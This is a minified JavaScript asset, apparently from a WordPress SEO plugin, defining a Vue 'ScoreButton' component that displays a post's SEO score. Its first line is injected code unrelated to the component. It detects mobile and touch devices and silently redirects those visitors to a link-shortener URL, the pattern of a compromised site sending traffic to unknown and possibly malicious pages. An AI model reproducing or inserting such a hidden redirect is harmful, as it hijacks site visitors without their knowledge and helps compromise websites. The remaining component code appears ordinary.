(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{f as t,i as n,B as u,O as l,ae as i,U as p,M as d,P as m,u as r}from"./vendor-vue-ui.232c7c36.js";const f=["id"],g={__name:"ScoreButton",props:{showScore:{type:Boolean,default:!0},score:{type:Number,default:0},postId:{type:Number,default:0}},setup(o){const e=o,s=r(()=>0<e.postId?`score-button-${e.postId}`:null),c=r(()=>!e.showScore||e.score===0?"score-disabled":40>e.score?"score-red":70>e.score?"score-orange":"score-green");return(a,_)=>(t(),n("div",{class:m(["aioseo-score-button",c.value]),id:s.value},[u(a.$slots,"icon"),o.showScore?(t(),n(l,{key:0},[i(p(o.score===0?"N/A":`${o.score}/100`),1)],64)):d("",!0)],10,f))}};export{g as _};
